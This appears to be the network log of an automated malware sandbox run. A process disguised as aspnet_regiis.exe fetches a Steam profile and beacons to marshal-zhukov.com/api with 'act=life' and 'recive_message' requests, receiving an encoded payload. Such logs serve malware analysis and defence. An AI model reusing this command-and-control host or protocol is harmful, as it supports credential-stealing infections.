                                                                                                                                                                                                            2024-11-14 11:19:28 UTC3768INData Raw: 70 6c 61 79 65 72 41 76 61 74 61 72 20 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 69 7a 65 20 6f 66 66 6c 69 6e 65 22 20 64 61 74 61 2d 6d 69 6e 69 70 72 6f 66 69 6c 65 3d 22 31 37 36 34 30 36 36 31 37 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d
                                                                                                                                                                                                            Data Ascii: playerAvatar profile_header_size offline" data-miniprofile="1764066172"><div class="playerAvatarAutoSizeInner"><img src="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div>
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC1345INData Raw: 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0d 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e
                                                                                                                                                                                                            Data Ascii: teamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">&copy; Valve Corporation. All rights reserved. All trademarks are property of their respective own


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.1049802188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:29 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2024-11-14 11:19:30 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:30 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=tepnqsqhslam841266prnj2csq; expires=Mon, 10-Mar-2025 05:06:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHbdd3Wo1QyP1PF9JwAoRus4Ji0VVngStN7eQltMM2qPE2Sl58iEt%2BEuTyaokRXH3EK%2FXnUVW1jh1yE4ZgVK4KM9exhUZS%2BwiOOMSMllWkUlz2ns3jlIjeXW0p1VRSwMgbFogYc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269b5ae8a64758-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=959&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2991735&cwnd=227&unsent_bytes=0&cid=13f9df93e4196b93&ts=1153&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2024-11-14 11:19:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.1049803188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:29 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2024-11-14 11:19:30 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:30 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ctna5qi31se0jh6jjtlh9uqabl; expires=Mon, 10-Mar-2025 05:06:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oPW70VVtcBLZm6YgAu5Rcp1HwdU%2Fg%2FL8IqGLDcRYPlL1D19Assvh26VPEEnHQB%2B8NNjCRQs9B8m8r45iWm1I35upMcH1uUB9L3zt6TBRFIATMPPQ1R%2BhFrlU8kwQ4lCVuQ0Z%2Be8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269b5aedad2d3b-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1576&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=909&delivery_rate=1797641&cwnd=237&unsent_bytes=0&cid=413b3f5d7ba50c10&ts=1115&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2024-11-14 11:19:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.1049814104.102.49.2544436080C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:31 GMT
                                                                                                                                                                                                            Content-Length: 26214
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=41fa7ebae8880889dd65bd86; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC11747INData Raw: 22 3f 6c 3d 74 63 68 69 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 63 68 69 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e7 b9 81 e9 ab 94 e4 b8 ad e6 96 87 20 28 54 72 61 64 69 74 69 6f 6e 61 6c 20 43 68 69 6e 65 73 65 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 6a 61 70 61 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6a 61 70 61 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e6 97 a5 e6 9c ac e8 aa 9e 20 28 4a
                                                                                                                                                                                                            Data Ascii: "?l=tchinese" onclick="ChangeLanguage( 'tchinese' ); return false;"> (Traditional Chinese)</a><a class="popup_menu_item tight" href="?l=japanese" onclick="ChangeLanguage( 'japanese' ); return false;"> (J


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.1049816188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 50
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 26 6a 3d
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@nmrzv88&j=
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:33 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4vvbm0e7h41qm5acaqervdsvhr; expires=Mon, 10-Mar-2025 05:06:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OdwSBRoTsf%2B1LmpnFgAFhkWh%2Fd%2BrRddID04V8dvK%2FReFBZHT09eSUQYKieLTRNgCnoCil12BxclmNP2qoM678Drm8mfLqnkJdlaA0wNUmCg5eds81LqOV8mr0i2qJ%2BeMoNXs9DU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269b662fbb6c19-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=952&delivery_rate=2269592&cwnd=251&unsent_bytes=0&cid=79366f3cbcb89dc7&ts=1964&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC351INData Raw: 31 64 39 33 0d 0a 44 33 56 30 6f 4d 38 78 4b 77 4a 33 36 46 39 48 48 45 39 67 32 6d 46 74 31 68 64 4a 4a 7a 48 4d 67 76 4a 69 59 46 38 69 74 71 31 30 56 77 4b 43 39 51 55 48 49 41 53 4e 66 58 31 6f 50 52 57 2f 54 55 2b 33 63 32 73 64 56 36 33 75 67 51 64 4d 66 56 54 62 6a 7a 55 54 46 63 79 38 56 41 63 67 45 70 42 39 66 55 63 30 51 72 38 50 54 2b 77 31 4c 45 31 54 72 65 36 51 41 77 73 77 55 74 72 4f 5a 78 6b 54 79 4b 70 53 54 32 4d 62 68 54 6f 69 65 53 34 4b 74 41 67 41 76 6e 70 72 43 78 4f 70 2b 4e 42 59 51 68 4a 48 77 73 78 43 46 41 66 4c 37 55 77 48 65 56 57 4e 4d 57 55 6d 62 51 47 2f 41 77 47 77 63 79 4a 50 57 61 54 6d 6b 51 59 4b 4c 30 76 51 78 57 63 58 45 4d 6d 67 57 31 74 75 45 59 49 78 4a 48 4d 75 51 76 5a 44 43 4b 77 31 63 77 55 41 6e 4f 4f 42 45
                                                                                                                                                                                                            Data Ascii: 1d93D3V0oM8xKwJ36F9HHE9g2mFt1hdJJzHMgvJiYF8itq10VwKC9QUHIASNfX1oPRW/TU+3c2sdV63ugQdMfVTbjzUTFcy8VAcgEpB9fUc0Qr8PT+w1LE1Tre6QAwswUtrOZxkTyKpST2MbhToieS4KtAgAvnprCxOp+NBYQhJHwsxCFAfL7UwHeVWNMWUmbQG/AwGwcyJPWaTmkQYKL0vQxWcXEMmgW1tuEYIxJHMuQvZDCKw1cwUAnOOBE
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 4d 79 73 58 6b 6c 79 48 59 45 32 49 47 77 6d 43 37 55 4f 44 37 6c 2f 4a 45 5a 54 71 65 71 61 44 77 67 35 54 64 6e 4a 62 52 64 57 6a 4f 31 55 55 53 42 4e 79 68 34 67 62 69 6f 4f 72 6b 45 31 39 47 70 6c 58 42 4f 70 37 4e 42 59 51 6a 56 46 31 38 78 6d 47 42 58 4b 70 6b 46 4a 63 68 4f 48 4f 44 64 34 4b 41 79 79 41 42 32 2b 65 79 31 47 57 71 58 70 6c 51 63 47 66 51 36 55 79 48 56 58 54 6f 4b 4d 58 6b 4a 73 48 35 30 39 5a 57 46 6a 47 2f 67 45 41 2f 51 74 61 30 46 53 71 75 47 55 44 67 77 35 54 4e 4c 42 59 42 67 51 79 4b 31 55 51 32 67 64 69 7a 41 75 63 53 30 48 74 51 63 4a 75 48 51 75 42 52 33 75 35 34 68 41 57 6e 31 75 30 38 78 2f 56 53 50 42 6f 31 31 4f 64 6c 57 56 63 7a 77 2b 4b 67 37 34 57 30 2b 36 63 43 52 58 55 72 7a 6c 6e 68 49 4f 4f 45 62 5a 7a 47 4d 58
                                                                                                                                                                                                            Data Ascii: MysXklyHYE2IGwmC7UOD7l/JEZTqeqaDwg5TdnJbRdWjO1UUSBNyh4gbioOrkE19GplXBOp7NBYQjVF18xmGBXKpkFJchOHODd4KAyyAB2+ey1GWqXplQcGfQ6UyHVXToKMXkJsH509ZWFjG/gEA/Qta0FSquGUDgw5TNLBYBgQyK1UQ2gdizAucS0HtQcJuHQuBR3u54hAWn1u08x/VSPBo11OdlWVczw+Kg74W0+6cCRXUrzlnhIOOEbZzGMX
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 31 4f 64 6c 57 56 63 7a 77 2b 4b 67 37 34 57 30 2b 34 66 43 74 4f 57 61 72 67 6c 77 30 48 50 6b 66 58 77 6d 6f 64 47 4d 57 70 58 30 42 74 45 34 6f 36 49 58 73 2f 42 37 45 50 41 2f 51 37 61 30 4a 4c 37 72 6a 51 4c 77 55 72 51 2f 76 4d 66 42 35 57 33 65 4e 4b 43 57 63 5a 79 6d 56 6c 65 53 67 4b 73 77 55 48 74 47 63 75 53 31 69 76 36 70 59 42 44 7a 46 47 31 4d 35 74 45 52 72 43 71 6c 52 62 63 68 43 4d 4c 79 38 2b 59 30 4b 2f 47 30 2f 73 4e 52 31 56 52 4c 2f 32 30 6a 55 42 4d 30 37 54 32 53 30 49 57 4e 76 74 56 45 55 67 54 63 6f 32 4a 58 49 71 43 72 34 48 42 37 74 36 49 6c 64 53 6f 75 36 43 42 77 49 30 54 74 76 44 5a 42 6f 52 7a 36 5a 5a 52 47 51 53 69 33 31 72 50 69 6f 61 2b 46 74 50 67 6d 55 6d 53 58 32 6c 37 4a 6c 41 48 58 4e 5a 6c 4d 68 68 56 30 36 43 71
                                                                                                                                                                                                            Data Ascii: 1OdlWVczw+Kg74W0+4fCtOWarglw0HPkfXwmodGMWpX0BtE4o6IXs/B7EPA/Q7a0JL7rjQLwUrQ/vMfB5W3eNKCWcZymVleSgKswUHtGcuS1iv6pYBDzFG1M5tERrCqlRbchCMLy8+Y0K/G0/sNR1VRL/20jUBM07T2S0IWNvtVEUgTco2JXIqCr4HB7t6IldSou6CBwI0TtvDZBoRz6ZZRGQSi31rPioa+FtPgmUmSX2l7JlAHXNZlMhhV06Cq
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 55 6a 6a 67 67 65 69 6f 47 76 67 78 50 2b 6a 55 73 58 52 50 32 6f 4c 38 6e 4e 33 39 68 37 6f 39 79 57 51 2b 43 71 6c 38 4a 4f 46 57 47 50 69 6c 32 49 67 53 78 44 77 57 39 66 69 64 4f 56 36 4c 70 6c 51 59 44 4f 45 58 56 79 32 45 64 45 4d 47 75 58 45 5a 76 48 63 70 7a 5a 58 6b 31 51 75 42 44 4b 71 4e 2b 4a 55 4d 54 73 61 36 4a 51 41 55 78 41 49 79 50 59 52 34 51 78 4b 68 66 53 47 59 64 6a 7a 55 68 66 79 73 45 75 77 77 4c 73 58 51 6b 51 56 2b 67 36 70 45 42 44 6a 5a 50 33 38 6f 74 57 56 62 46 74 52 4d 52 49 43 53 4a 4b 7a 4a 75 49 55 4b 6e 54 52 62 30 63 69 63 46 43 2b 37 68 67 67 6f 49 4d 30 58 62 79 6d 34 59 45 63 2b 72 58 30 4e 70 48 59 77 79 4c 47 77 75 44 72 59 45 41 62 68 37 4a 6b 39 51 6f 36 44 65 51 41 55 6c 41 49 79 50 51 52 41 62 37 4b 5a 66 54 69
                                                                                                                                                                                                            Data Ascii: UjjggeioGvgxP+jUsXRP2oL8nN39h7o9yWQ+Cql8JOFWGPil2IgSxDwW9fidOV6LplQYDOEXVy2EdEMGuXEZvHcpzZXk1QuBDKqN+JUMTsa6JQAUxAIyPYR4QxKhfSGYdjzUhfysEuwwLsXQkQV+g6pEBDjZP38otWVbFtRMRICSJKzJuIUKnTRb0cicFC+7hggoIM0Xbym4YEc+rX0NpHYwyLGwuDrYEAbh7Jk9Qo6DeQAUlAIyPQRAb7KZfTi
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 5a 54 42 74 42 61 42 44 56 2f 52 44 4c 46 56 44 72 61 4b 68 46 67 45 72 53 39 6e 44 4c 51 68 59 32 2b 31 55 52 53 42 4e 79 6a 73 71 64 79 34 4e 75 51 6f 44 75 58 41 69 51 46 4b 6f 35 4a 6f 4b 41 6a 74 47 31 63 70 6e 46 42 66 49 70 46 52 42 5a 78 61 59 66 57 73 2b 4b 68 72 34 57 30 2b 64 63 6a 6c 4c 51 2b 37 2f 33 68 6c 43 4f 6b 79 55 6c 79 30 54 48 4d 32 70 56 45 56 6d 45 49 77 77 4a 48 45 73 41 72 63 48 42 4c 31 7a 4b 6b 68 57 6f 2b 53 43 43 67 6b 79 54 4e 33 44 59 46 64 59 67 71 70 4c 43 54 68 56 75 7a 41 72 63 43 6f 55 2b 42 78 42 72 54 55 73 53 52 50 32 6f 4a 45 4d 44 54 35 50 31 38 78 73 48 51 54 51 6f 56 70 42 5a 52 6d 42 4d 79 4e 73 4b 77 32 78 41 41 79 39 63 69 4e 4a 57 61 33 6e 30 45 35 43 4f 6c 69 55 6c 79 30 30 41 64 4b 67 45 31 59 75 44 4d 6f
                                                                                                                                                                                                            Data Ascii: ZTBtBaBDV/RDLFVDraKhFgErS9nDLQhY2+1URSBNyjsqdy4NuQoDuXAiQFKo5JoKAjtG1cpnFBfIpFRBZxaYfWs+Khr4W0+dcjlLQ+7/3hlCOkyUly0THM2pVEVmEIwwJHEsArcHBL1zKkhWo+SCCgkyTN3DYFdYgqpLCThVuzArcCoU+BxBrTUsSRP2oJEMDT5P18xsHQTQoVpBZRmBMyNsKw2xAAy9ciNJWa3n0E5COliUly00AdKgE1YuDMo
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 67 53 32 45 51 71 79 65 69 52 4d 57 71 72 6f 6b 77 41 47 4f 55 66 52 7a 47 45 63 45 63 47 69 56 30 42 75 48 49 56 39 61 7a 34 71 47 76 68 62 54 35 56 75 4b 45 6c 65 37 76 2f 65 47 55 49 36 54 4a 53 58 4c 52 73 59 78 36 31 5a 54 32 51 51 6a 44 63 67 66 69 59 42 74 77 63 4a 73 48 6f 72 54 6c 71 76 35 70 55 4b 43 54 74 4e 31 38 6c 72 56 31 69 43 71 6b 73 4a 4f 46 57 71 4a 69 68 79 4b 6b 4b 6e 54 52 62 30 63 69 63 46 43 2b 37 72 6e 41 51 46 50 55 33 58 78 32 67 54 48 4d 65 74 57 31 74 6f 46 59 30 76 4e 33 34 6b 42 37 51 41 44 37 42 7a 49 6b 4e 51 71 71 44 65 51 41 55 6c 41 49 79 50 51 42 73 52 36 36 70 49 43 58 39 62 6b 33 30 69 63 6d 31 61 2b 41 49 45 76 6e 6f 6d 52 6c 57 74 36 35 55 4b 41 7a 70 49 32 64 31 75 47 42 6e 47 72 56 78 50 5a 68 53 46 4f 79 4a 33
                                                                                                                                                                                                            Data Ascii: gS2EQqyeiRMWqrokwAGOUfRzGEcEcGiV0BuHIV9az4qGvhbT5VuKEle7v/eGUI6TJSXLRsYx61ZT2QQjDcgfiYBtwcJsHorTlqv5pUKCTtN18lrV1iCqksJOFWqJihyKkKnTRb0cicFC+7rnAQFPU3Xx2gTHMetW1toFY0vN34kB7QAD7BzIkNQqqDeQAUlAIyPQBsR66pICX9bk30icm1a+AIEvnomRlWt65UKAzpI2d1uGBnGrVxPZhSFOyJ3
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC383INData Raw: 42 49 69 6b 73 4d 55 31 6d 70 38 4a 63 58 44 58 30 4f 6c 4d 41 74 54 79 2b 43 70 46 52 53 63 51 4f 48 4c 53 49 2b 45 6b 7a 34 47 30 2f 73 4e 52 35 47 58 61 44 6e 68 68 46 50 47 6c 62 65 79 48 30 51 41 63 33 74 48 51 6c 6d 56 64 4a 75 61 7a 34 70 45 2f 68 62 58 2b 59 75 66 68 59 45 2f 72 4b 50 54 68 74 39 56 70 53 58 50 31 6c 57 30 4f 30 4c 43 53 63 57 6d 43 38 6a 66 54 73 42 2f 7a 30 78 6b 32 38 6d 51 30 53 2f 33 71 34 48 47 44 42 47 77 39 34 68 41 68 58 4d 6f 31 52 66 49 46 76 4b 4d 6d 55 6d 46 45 4c 77 51 7a 44 36 4e 54 4d 46 43 2b 37 56 6b 77 34 4d 4f 6c 62 46 67 6b 6f 4e 47 38 53 36 51 67 6b 75 56 59 78 39 66 53 35 6a 51 72 77 53 54 2b 77 6c 65 52 34 47 2f 62 66 41 55 68 31 7a 57 5a 54 5a 4c 55 39 45 6a 4f 31 42 43 54 68 56 7a 54 34 33 62 43 73 42 72
                                                                                                                                                                                                            Data Ascii: BIiksMU1mp8JcXDX0OlMAtTy+CpFRScQOHLSI+Ekz4G0/sNR5GXaDnhhFPGlbeyH0QAc3tHQlmVdJuaz4pE/hbX+YufhYE/rKPTht9VpSXP1lW0O0LCScWmC8jfTsB/z0xk28mQ0S/3q4HGDBGw94hAhXMo1RfIFvKMmUmFELwQzD6NTMFC+7Vkw4MOlbFgkoNG8S6QgkuVYx9fS5jQrwST+wleR4G/bfAUh1zWZTZLU9EjO1BCThVzT43bCsBr
